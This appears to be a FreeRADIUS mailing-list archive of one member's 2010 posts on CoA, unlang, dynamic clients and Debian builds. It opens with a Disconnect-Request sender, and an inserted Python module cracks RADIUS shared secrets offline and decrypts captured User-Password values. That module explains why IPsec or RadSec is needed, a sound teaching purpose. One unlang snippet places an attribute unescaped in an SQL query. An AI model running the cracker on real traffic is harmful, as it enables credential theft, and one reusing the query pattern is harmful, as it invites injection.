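def disconnect_packet(user: str, session_id: str, secret: bytes, identifier: int = 1) -> bytes:
    return build_request(DISCONNECT_REQUEST, identifier,
                         [(USER_NAME, user.encode()), (ACCT_SESSION_ID, session_id.encode())],
                         secret)


def send_disconnect(nas_host: str, user: str, session_id: str, secret: bytes,
                    nas_port: int = 3799, timeout: float = 3.0) -> Optional[int]:
    """The external trigger itself: one UDP exchange with the NAS (not run offline)."""
    request = disconnect_packet(user, session_id, secret)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (nas_host, nas_port))
        response, _ = sock.recvfrom(4096)
    return check_response(request, response, secret)


def simulated_nas_reply(request: bytes, secret: bytes, code: int = DISCONNECT_ACK,
                        attrs: Iterable[Tuple[int, bytes]] = ()) -> bytes:
    """Constructed reply, shaped the way a conforming NAS answers; lets the
    exchange be exercised without a NAS on the network."""
    body = b"".join(avp(t, v) for t, v in attrs)
    header = struct.pack("!BBH", code, request[1], 20 + len(body))
    authenticator = hashlib.md5(header + request[4:20] + body + secret).digest()
    return header + authenticator + body


if __name__ == "__main__":
    # Constructed values; replace with the real NAS address, session and secret.
    print(send_disconnect("192.0.2.10", "alice", "0123abcd", b"verysecret"))
```

A NAK carrying Error-Cause 503 (Session-Context-Not-Found) is the normal answer when the session values do not match a live session, so the web page should surface the returned code rather than treat any reply as success. Whoever can reach the NAS's port 3799 with the secret can disconnect any user, so the secret used here deserves the same handling as the one in clients.conf.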
Re: Problem with Alcatel 4604 and Cisco ACS
On 2010/10/07 10:01 AM, matteo wrote:
> Hello, I'm in trouble trying to authenticate a client connecting to an Alcatel 4604 (Aruba device) to a Cisco ACS, because my Alcatel sends its MAC address as the Called-Station-Id value. On the Cisco side, this value corresponds to the SSID value, while on the Alcatel this attribute is sent via Aruba-Essid-Name (attribute 5 in dictionary.aruba). Is there a way to change this behavior or a remap of this attribute for Alcatel?

Where is FreeRADIUS involved?

--
Johan Meiring
Re: Radius+Ldap:Allow the same host in multiple vlans
On 2010/09/30 05:05 PM, Ramon Escriba wrote:
> Hi Alan, then is it possible to do a general match rule in huntgroups to, let's say, make the first 35 ports belong to VLAN A and the rest, 36 to 48, to VLAN B, or not?

It sounds like you need some custom logic. Have you looked at rlm_perl?

--
Johan Meiring
Re: Radius not recording - The maximum number of threads (300) are active, cannot spawn new thread to handle request
On 2010/09/29 06:58 PM, Marie Tambe wrote:
> If anybody is using MySQL for RADIUS, could you tell me the columns that you have created an index for?

Your question is invalid. Go buy a SQL book.

PS: It's already been suggested that this is the FreeRADIUS list, not the MySQL list.
PPS: "Buy a book" has also been suggested.

--
Johan Meiring
Re: Last call for 2.1.10
On 2010/09/22 03:15 PM, Alan DeKok wrote:
> I've put some preliminary tar files on:
> http://git.freeradius.org/pre/
> If there are any issues, let me know now. Otherwise we'll release 2.1.10 on Monday.

Would be nice to remove "+git" from debian/changelog

--
Johan Meiring
Originate COA home_server
Hi,

I've configured originate CoA using the originate-coa as an example. My (relevant/edited for privacy) configuration looks like this:

    client 11.22.33.44 {
        secret         = verysecret
        shortname      = test
        nastype        = other
        virtual_server = my_virtual_server
        coa_server     = my-coa
    }

    home_server my-coa {
        type   = coa
        ipaddr = 11.22.33.44
        port   = 3799
        secret = blah
        coa {
            irt = 2
            mrt = 16
            mrc = 5
            mrd = 30
        }
    }

    home_server_pool blah {
        type        = fail-over
        home_server = my-coa
    }

This works perfectly. The home_server_pool seems unnecessary though, but if I leave it out, "freeradius -X" complains that the home_server does not exist:

    /etc/freeradius/sites-enabled/my-config[1]: No such home_server or home_server_pool my-coa

It almost seems that the home_server_pool is necessary to instantiate the home_server. Reading proxy.conf and the originate-coa example, it seems that a home_server_pool is only necessary if you want to actually fail-over/round-robin, etc.

I'm sure I can leave the config as is, as the home_server_pool is never actually referenced.

Am I completely confused?

--
Johan Meiring
Re: AW: convert mac adresses to lower case
On 2010/09/20 04:01 PM, PENZ Robert wrote:
> Hi! But that's not the problem. The MAC address matches in the SQL statement, but I also need to return the MAC address to the RADIUS. In this reply the MAC address is lower case, and now the RADIUS checks that against the upper case version it gets from the switch. I cannot always return the MAC in upper case, as it would not work with the switches which send the MAC in lower case. I hope this makes sense.

Search this list. The question was asked about 2 months ago. It was answered.

--
Johan Meiring
Re: Last call for 2.1.10
On 2010/08/12 09:36 AM, Stefan Winter wrote:
>     /root/freeradius-server-2.1.10-pre/src/lib/.libs/libfreeradius-radius.so -lnsl -lresolv -lpthread -lssl -lcrypto -Wl,-rpath -Wl,/usr/local/freeradius/2.1.10-pre/lib
>     libeap/.libs/libfreeradius-eap.so: undefined reference to `radius_pairmake'
>     collect2: ld returned 1 exit status
>     gmake[6]: *** [radeapclient] Fehler 1
>     gmake[6]: Leaving directory `/root/freeradius-server-2.1.10-pre/src/modules/rlm_eap'

Hi,

Debian Lenny.

1) Please remember to update debian/changelog to 2.1.10

2) Same compile error:

    gcc -o .libs/radeapclient .libs/radeapclient.o libeap/.libs/libfreeradius-eap.so -lnsl -lresolv -lpthread -lssl -lcrypto -Wl,--rpath -Wl,/usr/lib/freeradius
    libeap/.libs/libfreeradius-eap.so: undefined reference to `radius_pairmake'
    collect2: ld returned 1 exit status
    make[7]: *** [radeapclient] Error 1
    make[7]: Leaving directory `/usr/src/freeradius-2.1.10-git/freeradius-server/src/modules/rlm_eap'
    make[6]: *** [rlm_eap] Error 2

Cheers,

--
Johan Meiring
Re: Last call for 2.1.10
On 2010/08/12 10:02 AM, Alan DeKok wrote:
> Stefan Winter wrote:
>> libeap/.libs/libfreeradius-eap.so: undefined reference to `radius_pairmake'
>
> This was noted the other day. I committed a fix, and just pushed it back to the git repositories.

I can confirm that it compiles on Debian Lenny now. Not tested it though.

--
Johan Meiring
Re: Of accounting data and security
On 2010/08/09 11:14 PM, Alan DeKok wrote:
> The accounting data is sent in the clear on a LAN. This shouldn't be a problem. If you're sending accounting data across the Internet, use IPSec. Don't even pretend to use anything else. RADIUS (and TACACS+) security is simply not as good as IPSec.

Hi,

I've also got a need to implement security in the near future. I've not started yet, but my problem is that the embedded devices that I use do not have enough flash to install the encryption needed for IPsec.

My thinking was to use radsecproxy-freeradius (my NAS, coova, supports RadSec).

Any comments on IPsec vs RadSec?

Thanks,

--
Johan Meiring
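The reason Alan's advice holds is that plain RADIUS has exactly one key, the shared secret, and every protection in the protocol is an MD5 computation over public packet bytes plus that secret. The following is an added example, not code from the thread or from the FreeRADIUS project, that makes this concrete: a single captured Accounting-Request (which carries no password and would be sent in the clear on the link Alan describes) is enough for an offline dictionary attack on the secret, and once the secret is known every captured Access-Request's User-Password can be read. All packets, the secret and the wordlist below are constructed test data; nothing here is taken from a real deployment.

```python
"""Why shared-secret RADIUS is weaker than IPsec: everything hangs on one MD5
keyed secret that a passive observer can recover offline.

Added example, not from the thread or the FreeRADIUS project.  All packets,
the secret and the wordlist are constructed test data.
"""
import hashlib
import struct
from typing import Dict, Iterable, Optional, Tuple

ACCESS_REQUEST, ACCOUNTING_REQUEST = 1, 4
USER_NAME, USER_PASSWORD, ACCT_STATUS_TYPE, ACCT_SESSION_ID = 1, 2, 40, 44


def avp(attr_type: int, value: bytes) -> bytes:
    """RFC 2865 type/length/value encoding of one attribute."""
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def parse_avps(data: bytes) -> Dict[int, bytes]:
    attrs: Dict[int, bytes] = {}
    pos = 0
    while pos + 2 <= len(data):
        length = data[pos + 1]
        if length < 2 or pos + length > len(data):
            raise ValueError("bad attribute length")
        attrs[data[pos]] = data[pos + 2:pos + length]
        pos += length
    return attrs


def accounting_request(identifier: int, attrs: Iterable[Tuple[int, bytes]], secret: bytes) -> bytes:
    """RFC 2866 3: Request Authenticator = MD5(Code+ID+Length+16 zero bytes+Attributes+Secret).
    This is the only integrity protection an Accounting-Request has."""
    body = b"".join(avp(t, v) for t, v in attrs)
    header = struct.pack("!BBH", ACCOUNTING_REQUEST, identifier, 20 + len(body))
    return header + hashlib.md5(header + bytes(16) + body + secret).digest() + body


def secret_matches(packet: bytes, candidate: bytes) -> bool:
    """Recompute the accounting authenticator with a candidate secret."""
    return hashlib.md5(packet[:4] + bytes(16) + packet[20:] + candidate).digest() == packet[4:20]


def crack_secret(captured_accounting: bytes, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack.  One sniffed Accounting-Request is enough: the
    authenticator is a plain MD5 over public bytes plus the secret, so every
    guess costs one MD5 and needs no interaction with the server."""
    for candidate in wordlist:
        if secret_matches(captured_accounting, candidate):
            return candidate
    return None


def hide_password(password: bytes, secret: bytes, request_authenticator: bytes) -> bytes:
    """RFC 2865 5.2 User-Password hiding: pad to 16-byte blocks and XOR block i
    with MD5(secret + previous ciphertext block); block 0 uses the Request
    Authenticator.  The keystream depends on nothing but the secret."""
    if not 0 < len(password) <= 128:
        raise ValueError("password must be 1..128 bytes")
    padded = password + bytes(-len(password) % 16)
    out, prev = b"", request_authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ k for p, k in zip(padded[i:i + 16], key))
        out += prev
    return out


def reveal_password(hidden: bytes, secret: bytes, request_authenticator: bytes) -> bytes:
    """Inverse of hide_password; padding NULs are stripped, so a password that
    really ends in NUL bytes is not round-tripped exactly."""
    out, prev = b"", request_authenticator
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out += bytes(c ^ k for c, k in zip(block, key))
        prev = block
    return out.rstrip(b"\x00")


def access_request(identifier: int, request_authenticator: bytes, user: bytes,
                   password: bytes, secret: bytes) -> bytes:
    """An Access-Request as a NAS would send it (authenticator is random in real life)."""
    body = avp(USER_NAME, user) + avp(USER_PASSWORD, hide_password(password, secret, request_authenticator))
    return struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(body)) + request_authenticator + body


def recover_user_password(captured_access_request: bytes, secret: bytes) -> bytes:
    """With the secret from crack_secret(), every captured Access-Request's
    User-Password is readable: the Request Authenticator travels in the packet."""
    attrs = parse_avps(captured_access_request[20:])
    return reveal_password(attrs[USER_PASSWORD], secret, captured_access_request[4:20])
```

The same MD5-over-secret structure applies to the Response Authenticator of every reply and to Message-Authenticator (HMAC-MD5 with the secret as key), so none of them change the picture: the secret's strength is the whole defence, and it is attacked at hash-cracking speed. That is why wrapping the traffic in IPsec or RadSec (TLS) is the only way to get confidentiality and a real key exchange, and why a long random secret per client still matters even then.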
Re: Freeradius 2.1.9 stop working
On 2010/08/05 11:04 AM, Alan Buxey wrote:
> 2.1.10 isn't out yet. But when it is, then your package maintainers should ensure a new RPM is available.

This page might tell you how to build an RPM from source.

http://wiki.freeradius.org/Red_Hat_FAQ

Use git as the source.

--
Johan Meiring
Re: suffix configuration
On 2010/08/05 08:17 PM, Sallee, Stephen (Jake) wrote:
> Does anyone have any input on this? It is kind of a problem for me and I could really use some help : )

realms

--
Johan Meiring
Re: suffix configuration
On 2010/08/05 08:37 PM, Sallee, Stephen (Jake) wrote:
>> realms
>
> ... thank you. Whilst I do appreciate brevity, a single monosyllabic response seems as though it may be a bit too brief : ) Can you elaborate? I am not asking for anyone to solve my problem for me but rather to be pointed in the correct direction.

Was hoping you had read all the files in /etc/radiusd (or /etc/freeradius) already.

Look at modules/realm

This is how you split off domain\user or u...@domain.

--
Johan Meiring
Re: Fwd: FreeRadius2MySQL
On 2010/08/04 01:35 PM, Student University wrote:
> so can you please guide me on how i can set up freeradius 2 with MySQL to be 100% ready for such production

That's easy. All you need to do is read the documentation.

--
Johan Meiring
Re: Tag and Untag a port in several VLAN
On 2010/08/03 01:51 PM, Fabien COMBERNOUS wrote:
> Thank you for your answer. I can't change the FreeRadius version. So I need to use a decimal number. Can you give me an example of how to untag a port in VLAN 7?

Just convert 0x320007 to decimal??

--
Johan Meiring
Re: Documentation question
On 2010/07/21 10:37 PM, Alan DeKok wrote:
> The only reference book available now is the O'Reilly book. I don't recommend it, as I don't think it will help you. What *specifically* are you looking for? The Wiki, documentation, and my http://deployingradius.com/ site contain a lot of information about how the server works, config files, examples, etc.

I find the best documentation to also be the doc/ folder as well as the example config files.

--
Johan Meiring
Re: freeradius and ADSL-Agent-Circuit-Id
On 2010/07/20 10:50 PM, Mike wrote:
>>     authorize {
>>         if (ADSL-Agent-Circuit-Id) {
>>             update request {
>>                 User-Name     := "%{ADSL-Agent-Circuit-Id}"
>>                 User-Password := "%{ADSL-Agent-Circuit-Id}"
>>             }
>>         }
>>
>> Make sure to add the User-Name (ADSL-Agent-Circuit-Id) to radcheck and set the password to the value of ADSL-Agent-Circuit-Id.
>>
>>     +--------+-----------+--------------------+----+-----------+
>>     | id     | username  | attribute          | op | value     |
>>     +--------+-----------+--------------------+----+-----------+
>>     | 226529 | adslagent | Cleartext-Password | := | adslagent |
>>     +--------+-----------+--------------------+----+-----------+
>
> This opens up a security hole I wish to avoid - if someone knows what my circuit Id's look like, and that database is used in any context where a user can send an id/password to authenticate that does NOT have ADSL-Agent-Circuit-Id in it, then I've created a bunch of known user id's for the bad guys to use.
>
> I am happy having a non-default SQL database schema but I think I really need the SQL lookup to be based on ADSL-Agent-Circuit-Id and not User-Name.
>
> Mike
> -
> List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html

How about this:

I'm 100% sure my syntax is wrong today (I'm not an unlang master yet), but the idea should work. Opinions?

    authorize {
        if (ADSL-Agent-Circuit-Id) {
            if ("%{sql:select count(*) from CircuitIdList where CircuitId='%{ADSL-Agent-Circuit-Id}'}" == "1") {
                update control {
                    Auth-Type := Accept
                }
            }
            else {
                reject
            }
        }
    }

--
Johan Meiring
Re: freeradius and ADSL-Agent-Circuit-Id
On 2010/07/21 11:00 AM, Alan DeKok wrote:
>     authorize {
>         ...
>         if (ADSL-Agent-Circuit-Id && (%{sql: select ...})) {
>             update control {
>                 Auth-Type := Accept
>             }
>         }
>         else {
>             reject
>         }
>     }

I disagree with the logic slightly.

In my opinion it will also be rejected if ADSL-Agent-Circuit-Id does not exist.

As far as I understand, the desirable result is:

If the ADSL-Agent-Circuit-Id does *not* exist, normal authentication must happen.
If it *does* exist, accept or reject, depending on its value.

Would this not work better?

    authorize {
        ...
        if (ADSL-Agent-Circuit-Id) {
            if (%{sql: select ...}) {
                update control {
                    Auth-Type := Accept
                }
            }
            else {
                reject
            }
        }
    }

--
Johan Meiring
Re: FR virtual server question and EAP configuration
On 2010/07/16 12:34 AM, Michal Bruncko wrote:
> Hello list
>
>     SSID 1 \
>     SSID 2 --- AP -- Trunk -- Router - FreeRadius
>     SSID 3 /
>
> My goal is to configure different security for different SSIDs through one freeradius with the virtual server feature.

This is possible, but with ONE virtual server.

> My first question is, is it possible to have a different FR server configuration per SSID on a single Access Point?

Yes. But using ONE virtual server.

> Called-Station-Id in Access-Request with form: radio-mac:ssid.

Why don't you use unlang, e.g. (This is pseudo code!!!)

    if (Called-Station-Id =~ /:SSID1$/) {
        pap
        chap
    }
    if (Called-Station-Id =~ /:SSID2$/) {
        pap
        mschap
    }

> Is it enough? I have been looking for any example for this scenario but without any success.

Don't do this. Do the above.

--
Johan Meiring
Re: dyndns ff 1.1.7
On 2010/07/16 05:35 PM, Alan DeKok wrote:
>> Otherwise, is it possible to check by nas-id??
>
> No.

You could try using rlm_raw and dynamic_clients.

Configure your dynamic client virtual server like this.

    client dynamic {
        ipaddr          = 0.0.0.0
        netmask         = 0
        dynamic_clients = dynamic_nas
        lifetime        = 86400
    }

    server dynamic_nas {
        authorize {
            update control {
                FreeRADIUS-Client-IP-Address     = "%{Packet-Src-IP-Address}"
                FreeRADIUS-Client-Require-MA     = no
                FreeRADIUS-Client-Secret         = "%{sql: select RadiusSecret from Nas where Identifier='%{raw:NAS-Identifier}'}"
                FreeRADIUS-Client-Shortname      = "%{Packet-Src-IP-Address}"
                FreeRADIUS-Client-NAS-Type       = other
                FreeRADIUS-Client-Virtual-Server = amobia_hotspot
            }
        }
    }

Tables above are my own, so modify the queries.

Cheers,

--
Johan Meiring
Re: rlm_perl version?
On 2010/05/25 10:13 PM, Jan Zacharias wrote:
> Hey Bjørn, thank you very much! The output is:
>
>     perl version: v5.10.1
>
> So it's clear that libperl and the perl version do match. However if I add a "use IO::Socket::INET" in the myfile, I still get
>
>     freeradius: symbol lookup error: /usr/lib/perl/5.10/auto/IO/IO.so: undefined symbol: Perl_Istack_sp_ptr
>
> What could be the reason? I run a Linux raw 2.6.32-22-generic #33-Ubuntu SMP Wed Apr 28 13:28:05 UTC 2010 x86_64 GNU/Linux system.

Hi,

Don't really know enough about libraries, but it could be related to a previous issue I had on Debian (issue still exists with 2.1.9).

Can you try the following:

1) Make sure freeradius is not already running.

2) Start freeradius as follows:

    /usr/sbin/freeradius -X

Confirm it fails.

3) Now start it like this:

    LD_PRELOAD=/usr/lib/libperl.so.5.10 /usr/sbin/freeradius -X

If the third step works, it is a Debian bug. Modify your /etc/init.d/freeradius. Look for:

    start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $PROGRAM || ret=$?

Replace with:

    LD_PRELOAD=/usr/lib/libperl.so.5.10 start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $PROGRAM || ret=$?

Cheers,

--
Johan Meiring
Re: Version 2.1.9 has been released
On 2010/05/24 12:28 PM, Alan DeKok wrote:
> This is a stable release, which is intended to fix outstanding bugs. We suggest reading the changelog below, to see if any issues you have encountered are fixed in this release.

debian/changelog still contains "+git". Don't know if it is supposed to be fixed.

--
Johan Meiring
Re: authentification
On 2010/05/18 10:47 PM, dorra aa wrote:
> is there somebody who wants to tell what's the utility of it?
>
> From: dj_dido2...@hotmail.com
> To: freeradius-users@lists.freeradius.org
> Subject: authentification
> Date: Tue, 18 May 2010 19:40:28 +
>
> hi freeradius, i want to ask how to use MAC Address Authentication in my freeradius. besides, i add a MAC address with daloradius. how can i test the success of that? thank you

Have a look here.

http://catb.org/~esr/faqs/smart-questions.html

Also here.

http://catb.org/~esr/faqs/smart-questions.html#homework

--
Johan Meiring
Re: COA default configuration...Need help to test radclient
On 2010/05/15 08:28 AM, Alan DeKok wrote:
>> ... Do I have to do anything more than any default configuration?
>
> In 2.1.8, there's an example CoA server in raddb/sites-available/coa

The coa example was missing from 2.1.8. Please have a look here.

http://github.com/alandekok/freeradius-server/blob/master/raddb/sites-available/coa

--
Johan Meiring
Re: Pending release of 2.1.9
On 2010/05/14 07:46 AM, Alan DeKok wrote:
> Johan Meiring wrote:
>> There is a lot of warnings though. Small subset says this.
>> -
>> dpkg-shlibdeps: warning: symbol radlog used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries.
>
> It's in the server core. There's no libfreeradius-server.so, though perhaps there could be. In any case, the warnings are minor.

Cool. I compiled the server and can confirm it runs OK on my development machine.

On another note, every time a new release comes out, I manually add rlm_raw and recompile. I updated rlm_raw to work with FR2 a while ago and have been running it successfully in production for about a year.

Any chance of getting it into the 2_1_0 branch? Patch attached.

--
Johan Meiring

rlm_raw_patch.gz
Description: GNU Zip compressed data
Re: Pending release of 2.1.9
On 2010/05/14 10:35 AM, Alan DeKok wrote:
> Johan Meiring wrote:
> ...
>
> The dynamic clients' code runs modules before the packet is decoded... but that's only because it doesn't *receive* the packet. So any raw access to the packet will return nothing. What are you doing with the module? I can't for the life of me see why it would be useful in *any* situation.

It's dynamic clients.

I use it inside dynamic clients to look up the client via the NAS-Identifier. My clients don't have fixed IPs. The only way to give different NASes different shared secrets is by doing this.

You made a modification to dynamic clients a while ago where you could get hold of the whole packet inside dynamic clients. Don't know if you remember this. You sent a mail to me about it on Wed, 27 May 2009 14:05:31 +0200

=== SNIP ===
I've made some changes in revision control that should help you.

The dynamic client virtual server will now receive the *full* RADIUS packet. Before, it was impossible to look at the contents.

You will *still* need to use the rlm_raw module to look at the raw packet contents. The contents are *not* decoded into attributes, as happens when receiving normal packets.

See http://git.freeradius.org/pre for a tar file that contains the code changes. You will need to add rlm_raw to the build. But after that, something like the following should work:

    authorize {
        ...
        if ("%{raw:NAS-Identifier}" == "foo") {
            ...
        }
        ...
    }
=== SNIP ===

It is definitely useful to me!

--
Johan Meiring
Re: Pending release of 2.1.9
On 2010/05/14 11:08 AM, Johan Meiring wrote:
> It's dynamic clients.

Alan,

I just saw you were cc-ed on the mail sent to this list. Not intentional. I know you hate it. I always use reply-to-all as a habit. It then replied to you as well.

Apologies

--
Johan Meiring
Re: Pending release of 2.1.9
On 2010/05/13 12:57 PM, Alan DeKok wrote:
> I've put pre releases of 2.1.9 on the web:
> http://git.freeradius.org/pre/
> Please try them, and note any issues. If there aren't problems, we can release 2.1.9 real soon now.

Builds fine on Debian Lenny using dpkg-buildpackage.

There is a lot of warnings though. Small subset says this.

    dpkg-shlibdeps: warning: symbol radlog used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries.
    dpkg-shlibdeps: warning: symbol cf_section_parse used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries.
    dpkg-shlibdeps: warning: symbol debug_flag used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries.
    dpkg-shlibdeps: warning: symbol rad_malloc used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries.
    dpkg-shlibdeps: warning: symbol log_debug used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries.

The warnings above also happen for other modules: rlm_mysql, rlm_pam, rlm_dbm, etc.

After building I end up with various packages:

    freeradius-common
    freeradius-mysql
    etc.

When building previous versions (tried 2.1.7), the packages were different:

    freeradius (note - no -common)
    freeradius-mysql
    etc.

I realise the official Debian packages have a freeradius and a freeradius-common, but the Debian packages built from source never had a -common.

When installing 2.1.9, I installed the -common instead of the non -common one. When trying to install freeradius-mysql afterwards, it complained about not finding the dependency freeradius (without -common).

There is something wrong with the package names.

Also, the version in debian/changelog still contains "git".

Hope that helps.

--
Johan Meiring
Re: Pending release of 2.1.9
On 2010/05/13 07:16 PM, Josip Rodin wrote:
> Simply install *both* packages, like the dependencies tell you to...

OOPS... Idiot mode. I didn't look properly. The one without -common *does* exist.

Apologies for time wasting.

--
Johan Meiring
Re: Is this Install Guide Complete?
On 2010/04/30 11:02 PM, Huckle Berry wrote:
> I don't see how having newer versions of perl/python could be an issue. As far as SSL is concerned, see below, as this server will be wiped soon.

The problem is that newer versions could have bugs. Stable distributions are much better.

The problem is now IMHO that an "invalid guide" to install a later version is out there. I realize that you might wipe your server soon, but others (that may not wipe their server soon) may try this.

The backports route is still better.

--
Johan Meiring
Re: radiusd does not logging while debug
On 2010/04/22 06:45 PM, Alan DeKok wrote:
> kes-...@yandex.ru wrote:
>> Hi, FreeRadius. How to force radiusd -X to do logging to a log file too?
>
>     $ radiusd -X > /var/log/radius/radius.log 2>&1

Or for both file and console:

    radiusd -X 2>&1 | tee /var/log/radius/radius.log

--
Johan Meiring
Using NAS IP Address as client key
Hi all,

The RADIUS spec currently identifies a NAS (client) by the NAS's IP address (Packet-Src-IP-Address?). That is how RADIUS works.

We have a bunch of hotspots out in the field which could be behind any kind of internet connection: broadband/dynamic IP, NATted, etc. Because we have no idea where a specific NAS's traffic might come from, we've implemented dynamic-clients. Using rlm_raw we use the NAS-Identifier to look up the shared secret in a database, and the client gets dynamically created. (Thanks Alan for the help with this one!!)

This works very well, but has a few irritating (not showstopping) side effects.

1) Sometimes we have more than one NAS behind the same NATted connection. This means that they all have to have the same shared secret.

2) Also it happens that a different NAS ends up behind a previous NAS's IP (dynamically assigned broadband IP) and then the shared secret is again rejected.

Within a corporate/large telco's network, the NASes (802.1X switches or DSLAMs) are generally behind fixed IPs, but for the hotspot world any NAS source IP goes.

Is it not maybe a good idea to start considering a different key to identify the NAS by? In clients.conf (or for dynamic clients) a parameter (nas-key) that could be Src-IP or Nas-Id, i.e. you can choose the key that identifies a specific NAS/client and therefore the shared secret.

Does it sound like a bad idea? How difficult would such a change in FreeRADIUS be? (I've not read the source code yet, just throwing an idea out there.)

Opinions?

PS: I realise that tunneling the RADIUS traffic is a different solution to the same problem, but in our case not always easy to implement. (The only extra layer I would love to see is RadSec.)

--
Johan Meiring